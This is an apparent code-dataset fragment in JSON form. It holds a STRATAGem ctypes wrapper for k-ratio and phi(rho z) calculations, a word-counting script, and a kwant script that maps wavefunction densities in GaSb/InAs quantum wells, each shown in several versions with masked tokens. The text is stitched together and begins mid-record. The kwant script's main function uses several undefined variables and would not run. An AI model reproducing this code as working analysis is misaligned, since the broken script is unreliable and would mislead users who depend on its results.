:data:`PRZMODE_GAU`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetPrzMode()\n\n prz_mode = property(get_prz_mode, set_prz_mode,\n doc='Property to get/set prz mode')\n\n @_check_key\n def set_fluorescence(self, flag):\n \"\"\"\n Sets the fluorescence flag.\n \n :arg flag: either \n \n * :data:`FLUORESCENCE_NONE`\n * :data:`FLUORESCENCE_LINE`\n * :data:`FLUORESCENCE_LINE_CONT`\n :type flag: :class:`int`\n \"\"\"\n flag_ = c.c_int(flag)\n logger.debug('StSetFluorFlg(%i)', flag)\n self._lib.StSetFluorFlg(flag_)\n\n @_check_key\n def get_fluorescence(self):\n \"\"\"\n Returns the fluorescence flag.\n \n :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`\n or :data:`FLUORESCENCE_LINE_CONT`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetFluorFlg()\n\n fluorescence = property(get_fluorescence, set_fluorescence,\n doc='Property to get/set fluorescence')\n\n @_check_key\n def set_standard_directory(self, dirpath):\n \"\"\"\n Sets the directory where standard files are stored.\n \n :arg dirpath: path to directory\n :type dirpath: :class:`str`\n \"\"\"\n dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))\n self._lib.StSetDirectory(c.c_int(1), dirpath_)\n\n @_check_key\n def get_standard_directory(self):\n \"\"\"\n Returns the directory where standard files are stored.\n \n :rtype: :class:`str`\n \"\"\"\n dirpath = (c.c_char * 256)()\n self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)\n return dirpath.value.decode('ascii')\n\n standard_directory = property(get_standard_directory, set_standard_directory,\n doc='Property to get/set standard directory')\n\n @_check_key\n def compute_kratio_vs_thickness(self, layer,\n thickness_low_m, thickness_high_m, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the thickness \n for a layer.\n \n :arg layer: layer of a sample (must have been previously added)\n :type layer: :class:`.Layer`\n \n :arg thickness_low_m: lower limit of the thickness in meters\n :type thickness_low_m: :class:`float`\n \n :arg thickness_high_m: upper limit of the thickness in meters\n :type thickness_high_m: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of thicknesses\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each thickness\n \"\"\"\n logger.debug('StSetKvsThicknessUnit(2)')\n self._lib.StSetKvsThicknessUnit(2) # unit in nm\n\n if layer not in self._layers:\n raise ValueError(\"Unknown layer\")\n ilayer = self._layers[layer]\n ilayer_ = c.c_int(ilayer)\n\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n\n # Compute\n low_ = c.c_double(thickness_low_m * 1e9)\n high_ = c.c_double(thickness_high_m * 1e9)\n logger.debug('StComputeKvsThickness(key, %i, %f, %f)',\n ilayer, thickness_low_m * 1e9, thickness_high_m * 1e9)\n if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_):\n self._raise_error(\"Cannot compute k-ratio vs thickness\")\n\n # Fetch results\n thicknesses = []\n kratios = {}\n\n thick_ = c.c_double()\n k_ = c.c_double()\n for i in range(step + 1):\n i_ = c.c_int(i)\n\n if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):\n self._raise_error(\"Cannot get thickness\")\n thicknesses.append(thick_.value)\n\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n iHv_ = c.c_int(indexes[2])\n\n if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,\n iHv_, c.byref(k_)):\n self._raise_error(\"Cannot get k-ratio\")\n kratios.setdefault(experiment, []).append(k_.value)\n\n return thicknesses, kratios\n\n @_check_key\n def compute_kratio_vs_energy(self, energy_high_eV, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the incident\n energy. \n Note that the computation also starts at 0 keV up to the specified energy.\n \n :arg energy_high_eV: upper limit of the thickness in electronvolts\n :type energy_high_eV: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of energies in electronvolts\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each energy\n \"\"\"\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n\n energy_ = c.c_double(energy_high_eV / 1e3)\n logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1e3,))\n self._lib.StSetMaxHV(energy_)\n\n # Compute\n logger.debug('StComputeKvsHV(key)')\n if not self._lib.StComputeKvsHV(self._key):\n self._raise_error(\"Cannot compute k-ratio vs energy\")\n\n # Fetch results\n energies = []\n kratios = {}\n\n k_ = c.c_double()\n bHV_ = c.c_bool(True)\n increment = float(energy_high_eV / 1e3) / step\n\n for i in range(step + 1):\n hv = i * increment\n hv_ = c.c_double(hv)\n\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n\n if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_, bHV_, c.byref(k_)):\n self._raise_error(\"Cannot get k-ratio\")\n\n kratios.setdefault(experiment, []).append(k_.value)\n\n energies.append(hv)\n\n return energies, kratios\n\n @_check_key\n def compute_kratios(self):\n \"\"\"\n Computes the k-ratios of the different experiments.\n \n :return: :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are k-ratios \n (:class:`float`).\n \"\"\"\n if len(self._layers) == 0:\n return self._compute_kratios_substrate()\n else:\n return self._compute_kratios_multilayers()\n\n @_check_key\n def _compute_kratios_multilayers(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_thickness`.\n \"\"\"\n for i, layer in enumerate(self._layers.keys()):\n if not layer.is_thickness_known():\n raise ValueError(\"Thickness of layer %i is unknown\" % i)\n\n # Compute\n layer = list(self._layers.keys())[0]\n thickness_low_m = layer.thickness_m\n thickness_high_m = layer.thickness_m * 10\n step = 1\n\n _thicknesses, kratios = \\\n self.compute_kratio_vs_thickness(layer, thickness_low_m,\n thickness_high_m, step)\n\n # Reorganize results\n output = {}\n for experiment, kratio in kratios.items():\n output.setdefault(experiment, kratio[0])\n\n return output\n\n @_check_key\n def _compute_kratios_substrate(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_energy`.\n \"\"\"\n output = {}\n\n step = 2\n for experiment in self._experiments:\n energy_high_eV = experiment.energy_eV\n\n _energies, kratios = \\\n self.compute_kratio_vs_energy(energy_high_eV, step)\n\n kratio = kratios[experiment][-1]\n if (kratio < 0): # Bug in strategem that some energy don't work\n logger.warn(\"STRATAGem returns a negative k-ratio, re-try with energy + 1 eV\")\n _energies, kratios = \\\n self.compute_kratio_vs_energy(energy_high_eV + 1.0, step)\n kratio = kratios[experiment][-1]\n\n output.setdefault(experiment, kratio)\n\n return output\n\n @_check_key\n def compute(self, iteration_max=50):\n \"\"\"\n Computes the unknown composition(s) and thickness(es) in the specified\n sample.\n \n :arg iteration_max: maximum number of iterations of the solve\n (default: 50)\n :type iteration_max: :class:`int`\n \n :return: calculated sample\n :rtype: :class:`.Sample`\n \"\"\"\n # Add missing experiments\n zs = set(exp.z for exp in self._experiments.keys())\n\n for layer in list(self._layers.keys()) + [self._substrate[0]]:\n for z, wf in layer.composition.items():\n if z in zs:\n continue\n if wf is None:\n continue\n logger.debug('Added dummy experiment for z=%i', z)\n exp = Experiment(z, LINE_KA, 0.0, analyzed=False) # dummy\n self.add_experiment(exp)\n\n # Set iteration maximum\n iteration_max_ = c.c_int(iteration_max)\n logger.debug('StSetMaxNbIter(%i)', iteration_max)\n self._lib.StSetMaxNbIter(iteration_max_)\n\n # Compute\n logger.debug('StComputeIterpStart(key)')\n if not self._lib.StComputeIterpStart(self._key):\n self._raise_error(\"Cannot start iteration\")\n\n continue_ = c.c_bool(True)\n iteration = 0\n\n logger.debug('Start iteration')\n while True:\n iteration += 1\n logger.debug('Iteration #%i' % iteration)\n\n logger.debug('StComputeIterpNext(key, %r)' % continue_.value)\n if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):\n break\n\n if not continue_.value:\n break\n\n logger.debug('Iteration completed')\n\n # Fetch results\n thick_known = c.c_bool()\n mass_thickness = c.c_double()\n thickness = c.c_double()\n density = c.c_double()\n\n def get_layer(layer, ilayer):\n ilayer_ = c.c_int(ilayer)\n\n logger.debug('StSdGetNbElts(key, %i)' % ilayer)\n nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)\n if nbelt == -1:\n self._raise_error(\"Cannot get number of elements\")\n\n flag_ = (c.c_int * nbelt)()\n wfs_ = (c.c_double * nbelt)()\n logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)\n if not self._lib.StSdGetLayRawConcs(self._key, ilayer_,\n flag_, wfs_):\n self._raise_error(\"Cannot get layer concentration\")\n\n composition = {}\n for z in layer.composition.keys():\n nra_ = c.c_int(z)\n logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))\n zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)\n composition[z] = wfs_[zindex]\n\n logger.debug(\"StSdGetThick(key, %i)\", ilayer)\n if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(thick_known),\n c.byref(mass_thickness), c.byref(thickness),\n c.byref(density)):\n self._raise_error(\"Cannot get thickness\")\n\n return (composition, thickness.value / 1e10,\n mass_thickness.value * 10.0, density.value * 1e3)\n\n sample = Sample(get_layer(*self._substrate)[0])\n\n for layer, ilayer in self._layers.items():\n sample.add_layer(*get_layer(layer, ilayer))\n\n return sample\n\n @_check_key\n def compute_prz(self, maxdepth_m=None, bins=100):\n \"\"\"\n Compute :math:`\\\\phi(\\\\rho z)` of all experiments.\n \n .. warning:: Only available for substrate (no layers).\n \n :arg maxdepth_m: maximum depth of the :math:`\\\\phi(\\\\rho z)` \n distribution in meters. If ``None``, Kanaya-Okayama electron range\n is used with a safety factor of 1.5.\n :type maxdepth_m: :class:`float`\n \n :arg bins: number of bins in the :math:`\\\\phi(\\\\rho z)` distribution\n :type bins: :class:`int`\n \n :return: a :class:`dict` where the keys are the experiments and the \n values are a tuple containing three lists:\n \n * :math:`\\\\rho z` coordinates (in g/cm2)\n * generated intensities of :math:`\\\\phi(\\\\rho z)` (no absorption)\n * emitted intensites of :math:`\\\\phi(\\\\rho z)`\n \"\"\"\n if len(self._layers) > 0:\n raise RuntimeError('PRZ can only be computed for substrate')\n\n # Set scaling\n hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())\n maxhv_eV = max(hvs_eV)\n maxhv_ = c.c_double(maxhv_eV / 1e3)\n logger.debug('StSetScaleHV(%s)', maxhv_eV / 1e3)\n self._lib.StSetScaleHV(maxhv_)\n\n # Compute\n logger.debug('StComputePrz(key)')\n if not self._lib.StComputePrz(self._key):\n self._raise_error('Cannot compute prz')\n\n # Get values\n przs = {}\n\n for experiment, indexes in self._experiments.items():\n # Size of each bin\n if maxdepth_m is None:\n # Calculate max depth using Kanaya-Okayama\n maxdepth_m = 0.0\n energy_keV = experiment.energy_eV / 1e3\n\n for z, fraction in self._substrate[0].composition.items():\n dr = (0.0276 * atomic_mass_kg_mol(z) * 1e3 * energy_keV ** 1.67) / \\\n (z ** 0.89 * mass_density_kg_m3(z) / 1e3)\n maxdepth_m += fraction / (dr * 1e-6)\n\n maxdepth_m = 1.0 / maxdepth_m\n maxdepth_m *= 1.5 # safety factor\n\n increment_kg_m2 = (maxdepth_m * self._substrate[0].density_kg_m3) / bins\n\n # Indexes\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n ihv_ = c.c_int(0)\n\n rzs = []\n ys_generated = []\n ys_emitted = []\n\n for i in range(bins):\n rz_ = c.c_double(i * increment_kg_m2 * 0.1)\n rzs.append(i * increment_kg_m2)\n\n y_ = c.c_double()\n bUseExp_ = c.c_bool(True)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_emitted.append(y_.value)\n\n y_ = c.c_double()\n bUseExp_ = c.c_bool(False)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_generated.append(y_.value)\n\n przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))\n\n return przs\n\n",
"step-ids": [
21,
23,
38,
39,
40
]
}
|
[
21,
23,
38,
39,
40
] |
text=open('mytext.txt','w')
x=text.write("I like coding\nit is a new part\nof my life!!!")
text=open('mytext.txt')
read=text.readlines()
i=0
counter=0
total=0
print("number of lines :"+str(len(read)))
while i<=len(read)-1:
counter=counter+read[i].count('\n') + read[i].count(' ')
total+=len(read[i])-read[i].count('\n') - read[i].count(' ')
i+=1
counter+=1
print('Number of words is :'+str(counter))
print('total number of letters are :' +str(total))
|
normal
|
{
"blob_id": "5ad8db85f4f705173cf5d0649af6039ebe1544b2",
"index": 7488,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('number of lines :' + str(len(read)))\nwhile i <= len(read) - 1:\n counter = counter + read[i].count('\\n') + read[i].count(' ')\n total += len(read[i]) - read[i].count('\\n') - read[i].count(' ')\n i += 1\ncounter += 1\nprint('Number of words is :' + str(counter))\nprint('total number of letters are :' + str(total))\n",
"step-3": "text = open('mytext.txt', 'w')\nx = text.write(\"\"\"I like coding\nit is a new part\nof my life!!!\"\"\")\ntext = open('mytext.txt')\nread = text.readlines()\ni = 0\ncounter = 0\ntotal = 0\nprint('number of lines :' + str(len(read)))\nwhile i <= len(read) - 1:\n counter = counter + read[i].count('\\n') + read[i].count(' ')\n total += len(read[i]) - read[i].count('\\n') - read[i].count(' ')\n i += 1\ncounter += 1\nprint('Number of words is :' + str(counter))\nprint('total number of letters are :' + str(total))\n",
"step-4": "text=open('mytext.txt','w')\nx=text.write(\"I like coding\\nit is a new part\\nof my life!!!\")\ntext=open('mytext.txt')\nread=text.readlines()\ni=0\ncounter=0\ntotal=0\nprint(\"number of lines :\"+str(len(read)))\n\nwhile i<=len(read)-1:\n counter=counter+read[i].count('\\n') + read[i].count(' ')\n total+=len(read[i])-read[i].count('\\n') - read[i].count(' ')\n i+=1\ncounter+=1\nprint('Number of words is :'+str(counter))\nprint('total number of letters are :' +str(total))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/env python
'''
Script for analysis of wavefunctions on GaSb/InAs/GaSb simmetric quantum wells.
This piece code is part of the project "phd_gasb_inas", which comprises the work
related to the Phd. Dissertation named: "Quantum transport of charge and spin in
topological insulators 2D".
Author: Marcos Medeiros
email: [email protected]
'''
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
# Kwant related stuff
import kwant
import tinyarray
# local application imports
from hamiltonians import gasb_hamiltonian as gasb
from system_geometry import shapes
from transport_tools import bands_and_currents as tools
def map_density(ax, syst, psi_sqrd, colormap = "Reds"):
# Plot the results:
# print(max(psi_sqrd))
kwant.plotter.map(syst, psi_sqrd, ax = ax, fig_size = (7,3), cmap = colormap, vmax = 0.99*max(psi_sqrd))
tools.edit_axis(ax,'dens')
return 0
def density_in_line(syst, states, Op = np.eye(6)):
y_stack = []
def line(site):
(x, y) = site.pos
half = 0
delta = shapes.A_STD
ans = abs(x - half) < delta
if ans == True : y_stack.append(y)
return ans
rho_line = kwant.operator.Density(syst, Op, where = line, sum = False)
dos_line = np.array([rho_line(p) for p in states])
return dos_line, np.array(y_stack)
def plot_dos_in_line(dos_line):
fig, ax = plt.subplots(1, 2, figsize = (10,5))
ax[0].plot(dos_line[0], color = 'red')
ax[1].plot(dos_line[1], color = 'blue')
plt.tight_layout()
plt.show()
def normalize(dos_in_line):
# return sum(dos_in_line)
return sum(dos_in_line)/max(sum(dos_in_line))
def print_info_dos_line(y_values, dos_in_line):
print(80*"=")
print("Size of dos_both: ", dos_in_line.shape)
print("Size of y_both: ", y_values.shape)
print("y_both:\n", y_values)
def main():
# Define the system:
hamiltonian = gasb.hamiltonian_97_k_plus()
# hamiltonian = gasb.hamiltonian_97_down()
lead_ham = gasb.free_ham(6)
centralShape = shapes.Rect()
syst = gasb.system_builder(hamiltonian, lead_ham, centralShape)
# Calculate the wave_function:
energia = 448
parametros = gasb.params_97
parametros['Eta3'] = 0
parametros['Eta2'] = 0
parametros['eF'] = 60
parametros = dict(GammaLead = parametros["GammaC"], V = 100, **parametros )
wf = kwant.wave_function(syst, energy = energia, params = parametros)
modes_left = wf(0)
modes_right = wf(1)
# modes_total = np.vstack((wf(0), wf(1)))
# Calculate the density:
sigma_z = tinyarray.array([[1,0],[0,-1]])
spin_proj= np.kron(sigma_z, np.eye(3))
identity = np.eye(6)
rho = kwant.operator.Density(syst, spin_proj)
psi_left = sum(rho(p) for p in modes_left)
psi_right = sum(rho(p) for p in modes_right)
# Calculate dos in a line
dos_in_line_from_left = density_in_line(syst, psi)
dos_in_line_from_both = density_in_line(syst, np.vstack((wf(0),wf(1))))
plt.plot(sum(dos_in_line_from_both))
plt.show()
# print(dos_in_line.shape)
# print(dos_in_line)
plot_dos_in_line(dos_in_line_from_left)
# plot_dos_in_line(dos_in_line_from_both)
print(sum(dos_in_line_from_both).shape)
# Plot the results:
colorRight = "seismic"
colorLeft = "seismic"
fig, ax = plt.subplots(2,2,figsize=(14,6))
y_values_left = y_values_left * (shapes.A0 / 10) # conversion to nm^{-1}
y_values_right = y_values_right * (shapes.A0 / 10) # conversion to nm^{-1}
min_line, max_line = -0.7 * shapes.L_STD, 0.7 * shapes.L_STD
map_density(ax[0][0], syst, psi_left, colormap = colorRight)
ax[0][0].vlines(0, min_line, max_line, linestyle = "--")
ax[0][0].set_title("left lead")
map_density(ax[1][0], syst, psi_right, colormap = colorLeft)
ax[1][0].vlines(0, min_line, max_line, linestyle = "--")
ax[1][0].set_title("right lead")
ax[0][1].plot(y_values_left, normalize(dos_in_line_from_left),
marker = ".", markersize = 2.5, linestyle = "-" )
ax[1][1].plot(y_values_right, normalize(dos_in_line_from_right),
marker = ".", markersize = 2.5, linestyle = "-" )
plt.tight_layout()
plt.show()
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "a012055d11202c68d9eddf5cf2a17043f9bbaf0a",
"index": 6851,
"step-1": "<mask token>\n\n\ndef map_density(ax, syst, psi_sqrd, colormap='Reds'):\n kwant.plotter.map(syst, psi_sqrd, ax=ax, fig_size=(7, 3), cmap=colormap,\n vmax=0.99 * max(psi_sqrd))\n tools.edit_axis(ax, 'dens')\n return 0\n\n\ndef density_in_line(syst, states, Op=np.eye(6)):\n y_stack = []\n\n def line(site):\n x, y = site.pos\n half = 0\n delta = shapes.A_STD\n ans = abs(x - half) < delta\n if ans == True:\n y_stack.append(y)\n return ans\n rho_line = kwant.operator.Density(syst, Op, where=line, sum=False)\n dos_line = np.array([rho_line(p) for p in states])\n return dos_line, np.array(y_stack)\n\n\ndef plot_dos_in_line(dos_line):\n fig, ax = plt.subplots(1, 2, figsize=(10, 5))\n ax[0].plot(dos_line[0], color='red')\n ax[1].plot(dos_line[1], color='blue')\n plt.tight_layout()\n plt.show()\n\n\n<mask token>\n\n\ndef print_info_dos_line(y_values, dos_in_line):\n print(80 * '=')\n print('Size of dos_both: ', dos_in_line.shape)\n print('Size of y_both: ', y_values.shape)\n print('y_both:\\n', y_values)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef map_density(ax, syst, psi_sqrd, colormap='Reds'):\n kwant.plotter.map(syst, psi_sqrd, ax=ax, fig_size=(7, 3), cmap=colormap,\n vmax=0.99 * max(psi_sqrd))\n tools.edit_axis(ax, 'dens')\n return 0\n\n\ndef density_in_line(syst, states, Op=np.eye(6)):\n y_stack = []\n\n def line(site):\n x, y = site.pos\n half = 0\n delta = shapes.A_STD\n ans = abs(x - half) < delta\n if ans == True:\n y_stack.append(y)\n return ans\n rho_line = kwant.operator.Density(syst, Op, where=line, sum=False)\n dos_line = np.array([rho_line(p) for p in states])\n return dos_line, np.array(y_stack)\n\n\ndef plot_dos_in_line(dos_line):\n fig, ax = plt.subplots(1, 2, figsize=(10, 5))\n ax[0].plot(dos_line[0], color='red')\n ax[1].plot(dos_line[1], color='blue')\n plt.tight_layout()\n plt.show()\n\n\n<mask token>\n\n\ndef print_info_dos_line(y_values, dos_in_line):\n print(80 * '=')\n print('Size of dos_both: ', dos_in_line.shape)\n print('Size of y_both: ', y_values.shape)\n print('y_both:\\n', y_values)\n\n\ndef main():\n hamiltonian = gasb.hamiltonian_97_k_plus()\n lead_ham = gasb.free_ham(6)\n centralShape = shapes.Rect()\n syst = gasb.system_builder(hamiltonian, lead_ham, centralShape)\n energia = 448\n parametros = gasb.params_97\n parametros['Eta3'] = 0\n parametros['Eta2'] = 0\n parametros['eF'] = 60\n parametros = dict(GammaLead=parametros['GammaC'], V=100, **parametros)\n wf = kwant.wave_function(syst, energy=energia, params=parametros)\n modes_left = wf(0)\n modes_right = wf(1)\n sigma_z = tinyarray.array([[1, 0], [0, -1]])\n spin_proj = np.kron(sigma_z, np.eye(3))\n identity = np.eye(6)\n rho = kwant.operator.Density(syst, spin_proj)\n psi_left = sum(rho(p) for p in modes_left)\n psi_right = sum(rho(p) for p in modes_right)\n dos_in_line_from_left = density_in_line(syst, psi)\n dos_in_line_from_both = density_in_line(syst, np.vstack((wf(0), wf(1))))\n plt.plot(sum(dos_in_line_from_both))\n plt.show()\n plot_dos_in_line(dos_in_line_from_left)\n print(sum(dos_in_line_from_both).shape)\n colorRight = 'seismic'\n colorLeft = 'seismic'\n fig, ax = plt.subplots(2, 2, figsize=(14, 6))\n y_values_left = y_values_left * (shapes.A0 / 10)\n y_values_right = y_values_right * (shapes.A0 / 10)\n min_line, max_line = -0.7 * shapes.L_STD, 0.7 * shapes.L_STD\n map_density(ax[0][0], syst, psi_left, colormap=colorRight)\n ax[0][0].vlines(0, min_line, max_line, linestyle='--')\n ax[0][0].set_title('left lead')\n map_density(ax[1][0], syst, psi_right, colormap=colorLeft)\n ax[1][0].vlines(0, min_line, max_line, linestyle='--')\n ax[1][0].set_title('right lead')\n ax[0][1].plot(y_values_left, normalize(dos_in_line_from_left), marker=\n '.', markersize=2.5, linestyle='-')\n ax[1][1].plot(y_values_right, normalize(dos_in_line_from_right), marker\n ='.', markersize=2.5, linestyle='-')\n plt.tight_layout()\n plt.show()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef map_density(ax, syst, psi_sqrd, colormap='Reds'):\n kwant.plotter.map(syst, psi_sqrd, ax=ax, fig_size=(7, 3), cmap=colormap,\n vmax=0.99 * max(psi_sqrd))\n tools.edit_axis(ax, 'dens')\n return 0\n\n\ndef density_in_line(syst, states, Op=np.eye(6)):\n y_stack = []\n\n def line(site):\n x, y = site.pos\n half = 0\n delta = shapes.A_STD\n ans = abs(x - half) < delta\n if ans == True:\n y_stack.append(y)\n return ans\n rho_line = kwant.operator.Density(syst, Op, where=line, sum=False)\n dos_line = np.array([rho_line(p) for p in states])\n return dos_line, np.array(y_stack)\n\n\ndef plot_dos_in_line(dos_line):\n fig, ax = plt.subplots(1, 2, figsize=(10, 5))\n ax[0].plot(dos_line[0], color='red')\n ax[1].plot(dos_line[1], color='blue')\n plt.tight_layout()\n plt.show()\n\n\ndef normalize(dos_in_line):\n return sum(dos_in_line) / max(sum(dos_in_line))\n\n\ndef print_info_dos_line(y_values, dos_in_line):\n print(80 * '=')\n print('Size of dos_both: ', dos_in_line.shape)\n print('Size of y_both: ', y_values.shape)\n print('y_both:\\n', y_values)\n\n\ndef main():\n hamiltonian = gasb.hamiltonian_97_k_plus()\n lead_ham = gasb.free_ham(6)\n centralShape = shapes.Rect()\n syst = gasb.system_builder(hamiltonian, lead_ham, centralShape)\n energia = 448\n parametros = gasb.params_97\n parametros['Eta3'] = 0\n parametros['Eta2'] = 0\n parametros['eF'] = 60\n parametros = dict(GammaLead=parametros['GammaC'], V=100, **parametros)\n wf = kwant.wave_function(syst, energy=energia, params=parametros)\n modes_left = wf(0)\n modes_right = wf(1)\n sigma_z = tinyarray.array([[1, 0], [0, -1]])\n spin_proj = np.kron(sigma_z, np.eye(3))\n identity = np.eye(6)\n rho = kwant.operator.Density(syst, spin_proj)\n psi_left = sum(rho(p) for p in modes_left)\n psi_right = sum(rho(p) for p in modes_right)\n dos_in_line_from_left = density_in_line(syst, psi)\n dos_in_line_from_both = density_in_line(syst, np.vstack((wf(0), wf(1))))\n plt.plot(sum(dos_in_line_from_both))\n plt.show()\n plot_dos_in_line(dos_in_line_from_left)\n print(sum(dos_in_line_from_both).shape)\n colorRight = 'seismic'\n colorLeft = 'seismic'\n fig, ax = plt.subplots(2, 2, figsize=(14, 6))\n y_values_left = y_values_left * (shapes.A0 / 10)\n y_values_right = y_values_right * (shapes.A0 / 10)\n min_line, max_line = -0.7 * shapes.L_STD, 0.7 * shapes.L_STD\n map_density(ax[0][0], syst, psi_left, colormap=colorRight)\n ax[0][0].vlines(0, min_line, max_line, linestyle='--')\n ax[0][0].set_title('left lead')\n map_density(ax[1][0], syst, psi_right, colormap=colorLeft)\n ax[1][0].vlines(0, min_line, max_line, linestyle='--')\n ax[1][0].set_title('right lead')\n ax[0][1].plot(y_values_left, normalize(dos_in_line_from_left), marker=\n '.', markersize=2.5, linestyle='-')\n ax[1][1].plot(y_values_right, normalize(dos_in_line_from_right), marker\n ='.', markersize=2.5, linestyle='-')\n plt.tight_layout()\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport kwant\nimport tinyarray\nfrom hamiltonians import gasb_hamiltonian as gasb\nfrom system_geometry import shapes\nfrom transport_tools import bands_and_currents as tools\n\n\ndef map_density(ax, syst, psi_sqrd, colormap='Reds'):\n kwant.plotter.map(syst, psi_sqrd, ax=ax, fig_size=(7, 3), cmap=colormap,\n vmax=0.99 * max(psi_sqrd))\n tools.edit_axis(ax, 'dens')\n return 0\n\n\ndef density_in_line(syst, states, Op=np.eye(6)):\n y_stack = []\n\n def line(site):\n x, y = site.pos\n half = 0\n delta = shapes.A_STD\n ans = abs(x - half) < delta\n if ans == True:\n y_stack.append(y)\n return ans\n rho_line = kwant.operator.Density(syst, Op, where=line, sum=False)\n dos_line = np.array([rho_line(p) for p in states])\n return dos_line, np.array(y_stack)\n\n\ndef plot_dos_in_line(dos_line):\n fig, ax = plt.subplots(1, 2, figsize=(10, 5))\n ax[0].plot(dos_line[0], color='red')\n ax[1].plot(dos_line[1], color='blue')\n plt.tight_layout()\n plt.show()\n\n\ndef normalize(dos_in_line):\n return sum(dos_in_line) / max(sum(dos_in_line))\n\n\ndef print_info_dos_line(y_values, dos_in_line):\n print(80 * '=')\n print('Size of dos_both: ', dos_in_line.shape)\n print('Size of y_both: ', y_values.shape)\n print('y_both:\\n', y_values)\n\n\ndef main():\n hamiltonian = gasb.hamiltonian_97_k_plus()\n lead_ham = gasb.free_ham(6)\n centralShape = shapes.Rect()\n syst = gasb.system_builder(hamiltonian, lead_ham, centralShape)\n energia = 448\n parametros = gasb.params_97\n parametros['Eta3'] = 0\n parametros['Eta2'] = 0\n parametros['eF'] = 60\n parametros = dict(GammaLead=parametros['GammaC'], V=100, **parametros)\n wf = kwant.wave_function(syst, energy=energia, params=parametros)\n modes_left = wf(0)\n modes_right = wf(1)\n sigma_z = tinyarray.array([[1, 0], [0, -1]])\n spin_proj = np.kron(sigma_z, np.eye(3))\n identity = np.eye(6)\n rho = kwant.operator.Density(syst, spin_proj)\n psi_left = sum(rho(p) for p in modes_left)\n psi_right = sum(rho(p) for p in modes_right)\n dos_in_line_from_left = density_in_line(syst, psi)\n dos_in_line_from_both = density_in_line(syst, np.vstack((wf(0), wf(1))))\n plt.plot(sum(dos_in_line_from_both))\n plt.show()\n plot_dos_in_line(dos_in_line_from_left)\n print(sum(dos_in_line_from_both).shape)\n colorRight = 'seismic'\n colorLeft = 'seismic'\n fig, ax = plt.subplots(2, 2, figsize=(14, 6))\n y_values_left = y_values_left * (shapes.A0 / 10)\n y_values_right = y_values_right * (shapes.A0 / 10)\n min_line, max_line = -0.7 * shapes.L_STD, 0.7 * shapes.L_STD\n map_density(ax[0][0], syst, psi_left, colormap=colorRight)\n ax[0][0].vlines(0, min_line, max_line, linestyle='--')\n ax[0][0].set_title('left lead')\n map_density(ax[1][0], syst, psi_right, colormap=colorLeft)\n ax[1][0].vlines(0, min_line, max_line, linestyle='--')\n ax[1][0].set_title('right lead')\n ax[0][1].plot(y_values_left, normalize(dos_in_line_from_left), marker=\n '.', markersize=2.5, linestyle='-')\n ax[1][1].plot(y_values_right, normalize(dos_in_line_from_right), marker\n ='.', markersize=2.5, linestyle='-')\n plt.tight_layout()\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n",
